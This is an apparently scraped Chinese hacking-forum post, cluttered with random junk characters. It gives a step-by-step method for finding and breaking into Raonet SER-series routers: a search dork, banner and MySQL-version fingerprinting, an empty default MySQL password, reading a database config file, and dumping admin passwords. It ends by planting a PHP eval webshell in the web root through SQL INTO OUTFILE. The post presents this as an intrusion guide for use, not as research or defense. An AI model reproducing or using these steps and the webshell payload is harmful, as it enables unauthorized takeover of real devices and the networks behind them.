寻找存在漏洞的路由器方法:
8 p+ N5 R: t4 H( @ \% r5 G- g
1 ~ t: d* Z4 L- T, L$ W1:google搜索'Raonet Subscriber Ethernet Router'
0 ?: V, l3 T0 ^6 y: S7 m' z/ O8 P; d+ V* j8 k- C% H( A
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20019 r$ U4 x* U7 c( n! ^& j; z- L
" w' N3 V: w( C1 I! B
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。3 y$ }& [$ r: b. o+ B
$ T+ v8 K9 ?7 t( b( l" O4 ^. |//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
- N+ w M. A3 r8 |
* y" l, W' I- R" ?
. F* l/ i3 H9 r5 f
9 C3 ]5 h5 q! o5 {& B( P& c. F入侵步骤:- }) z% c6 O; Q% S1 Y/ u
3 Q8 _( L( I! v- {8 o' I, C
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
1 K# Q; U9 h' `# h& ]: A! I, }- g# r5 r4 T
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
9 W* f1 ?( }6 d m3:得到密码后连接,查看GUI管理密码:- i2 H" M3 B1 o# T6 z
use ser_500( i% P+ o7 d/ N) A) Q
select id,passwd from user;0 D; m$ Y- ]+ T P$ x/ O+ D
4:通过数据库写入webshell,执行命令:5 |2 [9 I0 Z5 d, H+ |
use mysql; I# s6 a8 A8 e$ \8 O; M% O. B
create table ok(cmd TEXT);3 I1 m0 j) L: g
insert into ok values("<?php @eval($_POST[cmd])?>");
( i F, G$ e i0 I: b5 m6 Zselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";1 w7 @) D$ c6 q; q3 {
drop table ok;
1 S( B+ Y; C7 j. r. x: m+ q
2 j- A6 @- a2 G7 J5:连接后门shell.php 3 N! {; f2 Q9 w: g6 f+ I6 q b" h V
" Q% J0 Q! A4 J5 v0 B
6. 搞定!* b/ ]1 j8 D. p1 m0 d
% e) c3 M$ `0 D% w% ] |